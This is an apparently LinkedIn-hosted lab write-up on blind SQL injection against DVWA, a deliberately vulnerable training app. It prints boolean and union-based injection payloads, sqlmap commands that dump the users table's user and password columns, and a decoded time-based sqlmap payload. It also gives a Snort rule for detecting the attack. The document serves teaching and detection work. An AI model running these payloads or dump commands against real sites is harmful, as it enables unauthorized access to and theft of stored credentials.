![SQL Injection (Blind) [DVWA]](https://media.licdn.com/dms/image/v2/D4E12AQFlw_qxaKyBlQ/article-cover_image-shrink_720_1280/article-cover_image-shrink_720_1280/0/1671305900139?e=2147483647&v=beta&t=Fmf7GVdTpCh0i-DlJg-hQP1hdcViokzwiAZxm5Lr-oA)
SQL Injection (Blind) [DVWA]
Today, we will be covering SQL Injection. Our goal for today is
Methodology
Blind SQL injection arises when an application is vulnerable to SQL injection. Still, its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.
With blind SQL injection vulnerabilities, many techniques, such as UNION attacks, are not effective because they rely on being able to see the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorized data, but different techniques must be used.
What is the difference between SQL Injection [Blind] vs. regular old SQL injection?
One (SQL Injection) has an error message displayed, vs. One (SQL Blind) has no error shown.
For example, we had an error message in the SQL injection section. It looks something like this.
Now, we won't be given that error. Let me show you.
If I were to enter an `, it would throw an error. But in a SQL Blind, it would usually not throw any error.
That being said, How do we know if an SQL login form or any input form has a SQL injection? By making different SQL queries that ask the database TRUE or FALSE questions. Then they analyze differences in responses between TRUE and FALSE statements.
Let's say we enter one <- True Statement
This is what we get
We can also try this to see if it is a true statement.
1' and 1=1#
As we can see, we got the same output. Let's try a false statement to see how the database will react.
1' and 1=0#
As we can see, it throws a false because 1=0 (false), and all side has to be true using AND. That signal to us that a SQL vulnerability is there since it registers 1=0 as a statement.
The next step we want to do is to find the number of columns. Two ways we can do this:
I will be demonstrating both methods.
Finding the Number of Columns using order by:
1' order by 1#
Here I got a true statement. I will keep going until I get an error or what the page deems false.
1' order by 2#
1' order by 3#
There we go; we got a false reaction. So now we know that the number of columns in the database is two.
Finding the Number of Columns using Select
For example:
Let's demonstrate this technique in DVWA.
This empty page is our error. Let's go back and try 1,2
There you go; we didn't get an error. So the number of columns we got is 2.
Step 3: Display the Vulnerable columns
You can display Vulnerable columns by doing union select 1,2,3,4,5,6,7
STEP 4 – Finding version, database, and user (optional)
Replace the shown number on the page with:
For example:
union select 1,2,version(),3,4,5,6,7 or union select 1,2,version(),3,4,5,6,7 -- or #
Step 5 - Finding the Table name
You can use information_schema to read the table names if the database version is five or above.
You need to guess the table names if the database version is four or fewer. e.g., user | tbluser | username
Step 6 - Finding the column name
Replace group_concat(table_name) with group_concat(column_name)
Replace from information_schema.tables where table_schema=database()with from information_schema.columns where table_name=“table_name”
Step 7:?Final Step - Read the data
Network Perspective
Analyzing SQL injection vs. SQL blind is pretty much the same. You can see the SQLi command that the adversary did.
You can find the PCAP file of the SQL blind attack here:
领英推荐
We can see the attacks that the hacker tried if we were to decode each URL request.
Here are the two requests:
Encoded:
id=1%27+and+1%3D0%23&Submit=Submit
id=1%27+and+1%3D1%23
Decoded:
id=1' and 1=0#&Submit=Submit
id=1' and 1=1#
We can see the adversary trying True/False Query statements.
How to detect a SQL Injection [Blind] Attack using snort?
One way we can detect SQLi [Blind] Attack is by detecting the true/false statement. Since hackers have to try?true/false statements?to?see if sql exist injection exists in the webpage,?why not use that as an advantage to detect the sql injection?
Let's get right into it.
sudo nano /etc/snort/rules/local.rules
Here I will create a rule that detects the keyword "and" being used and "select".
alert tcp any any -> 172.20.25.16 80 (content: "GET"; content:"and"; http_method; content:"="; http_method; msg:"SQL Injection Blind Detected"; sid: 1000001; rev: 1;)
Let's start up snort.
sudo snort -c /etc/snort/snort.conf -A console
Let's launch the attack and see if the IDS picks it up:
That's all for SQL Injection (Blind). The next following vulnerability is Weak Session IDs.
[Click-Here] for Weak Session IDS
Bonus section: We'll use an automated tool (SQLMAP) for SQL injection.
It goes through all the steps in SQL injection for us.
While using SQLmap, let's capture the traffic using pfsense and run our IDS to see if it detects anything.
For this, I uncommented the code that I had previously. Make sure to re-number the sid.
Let's initial the attack with SQLmap.
sqlmap -u "https://172.20.25.16/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" -cookie="security=low; PHPSESSID=8eo4ejhk6s571bvptjbcan0e5c"
You can get the PHPSESSID from Inspect Element -> Storage.
When we run this command, we will get the database.
As you can see, our snort is picking up the SQL injection.
The command we will do will explore the DVWA database and see what tables are inside.
sqlmap -u "https://172.20.25.16/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ps40ueenlg054a6lc3h1cvopf9" -D dvwa --tables
Let's explore the user's tables and see the columns that are in the tables.
sqlmap -u "https://172.20.25.16/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ps40ueenlg054a6lc3h1cvopf9" -D dvwa -T users --columns
Then we can dump (display) all the columns that are in the table
sqlmap -u "https://172.20.25.16/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ps40ueenlg054a6lc3h1cvopf9" -D dvwa -T users --dump
We have our tables
To dump specific columns, we can do this command:
sqlmap -u "https://172.20.25.16/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ps40ueenlg054a6lc3h1cvopf9" -D dvwa -T users -C user,password --dump
As we can see from our snort, it was able to pick up and detect SQL injection
Let's look at our PCAP.
PCAP file can be found here: (Listed as SQLmap)
We can see that many SQL injection attempts were made from sqlmap. The user-agent was what gives it away since it was listed as sqlmap/1.6. Additionally, if we were to decode the URL, we can see what command SQL map was doing.
Encoded:
id=1%27%20AND%20%28SELECT%203507%20FROM%20%28SELECT%28SLEEP%285-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28table_name%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%3D0x696e666f726d6174696f6e5f736368656d61%29%2C1%2C1%29%29%3E51%2C0%2C5%29%29%29%29%29NyUo%29%20AND%20%27vVsR%27%3D%27vVsR&Submit=Submit
Decoded:
id=1' AND (SELECT 3507 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x696e666f726d6174696f6e5f736368656d61),1,1))>51,0,5)))))NyUo) AND 'vVsR'='vVsR&Submit=Submit
Well, that wraps up the SQLmap portion. See you at the next one.
--
3 个月Nice brother